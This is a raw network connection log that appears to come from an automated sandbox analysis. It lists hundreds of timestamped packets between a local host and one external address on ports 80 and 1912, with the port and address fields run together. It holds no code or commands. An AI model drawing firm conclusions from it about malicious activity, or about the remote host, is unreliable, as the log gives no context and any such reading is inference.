                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.715377092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.716080904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.716144085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.716207027 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.717128992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.717258930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.717320919 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.718180895 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.756606102 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.772237062 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.779752970 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.852829933 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.852864027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.852929115 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.853382111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.853564024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.853611946 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.854427099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.854535103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.854583979 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.855735064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.855879068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.855931044 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.856697083 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.856800079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.856847048 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.857703924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.857781887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.857840061 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.858942032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.859050989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.859195948 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.860001087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.860083103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.860249996 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.861118078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.861202002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.861252069 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.862221003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.862251997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.862309933 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.863343954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.863599062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.863653898 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.864376068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.864485025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.864532948 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.865641117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.865751982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.865813971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.866729975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.866889000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.866967916 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.867861986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.867975950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.868021965 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.868926048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.869036913 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.869082928 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.869920969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.870012999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.870063066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.871056080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.871232986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.871290922 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.872112036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.872236967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.872349024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.873208046 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.873290062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.873337984 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.874315977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.874515057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.874574900 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.875475883 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.875679970 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.875725031 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.876526117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.876600981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.876647949 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.877648115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.877774000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.877830982 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.878874063 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.878978014 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.879154921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.879975080 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.880192041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.880275011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.881078959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.881197929 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.881261110 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.882066965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.882185936 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.882282972 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.883311033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.883450031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.883497953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.884319067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.884371996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.884423018 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.885338068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.885463953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.885519028 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.886470079 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.886594057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.886640072 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.887583017 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.887712955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.887762070 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.888665915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.888817072 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.888860941 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.889759064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.889832020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.889878035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.890870094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.890980959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.891024113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.892184973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.892250061 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.892436028 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.893121958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.893208981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.893254995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.894184113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.894252062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.894304991 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.895309925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.895514011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.895567894 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.896430016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.896564007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.896620035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.897533894 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.897677898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.897733927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.898818016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.898967028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.899018049 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.899729013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.899838924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.899893999 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900008917 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900032997 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900093079 CET497391912192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900185108 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900203943 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900275946 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900326014 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900381088 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900389910 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900433064 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900485992 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.900813103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.901005030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.901057959 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.901937962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.901985884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.902038097 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.903083086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.903242111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.903286934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.904186010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.904299021 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.904342890 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.905257940 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.905340910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.905407906 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.906465054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.906594038 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.906744003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.907485962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.907543898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.907597065 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.908554077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.908658028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.908710003 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.909677029 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.909775972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.909820080 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.910711050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:40.959743977 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.020942926 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.021024942 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.021034956 CET191249739176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.057161093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.057229996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.057354927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.057590961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.057719946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.058641911 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.058722019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.058743000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.058794022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.059880018 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.059958935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.060024023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.060844898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.060956955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.061933994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.061990976 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.062041998 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.062084913 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.063061953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.063127041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.063179970 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.064124107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.064260960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.064313889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.065201998 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.065331936 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.065388918 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.066384077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.066489935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.066633940 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.067467928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.067609072 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.067658901 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.068523884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.068645000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.068692923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.069627047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.069732904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.069777966 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.070779085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.070944071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.070991993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.071892023 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.071989059 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.072036028 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.072966099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.073065996 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.073112011 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.074068069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.074134111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.074177980 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.075174093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.075297117 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.075341940 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.076286077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.076380968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.076423883 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.077369928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.077461004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.077507973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.078474045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.078599930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.078653097 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.079636097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.079731941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.079780102 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.080837965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.080925941 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.080974102 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.081893921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.081974983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.082017899 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.082922935 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.083029032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.083075047 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.084321022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.084496975 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.084553957 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.085228920 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.085336924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:41.085386992 CET4973880192.168.2.4176.111.174.140
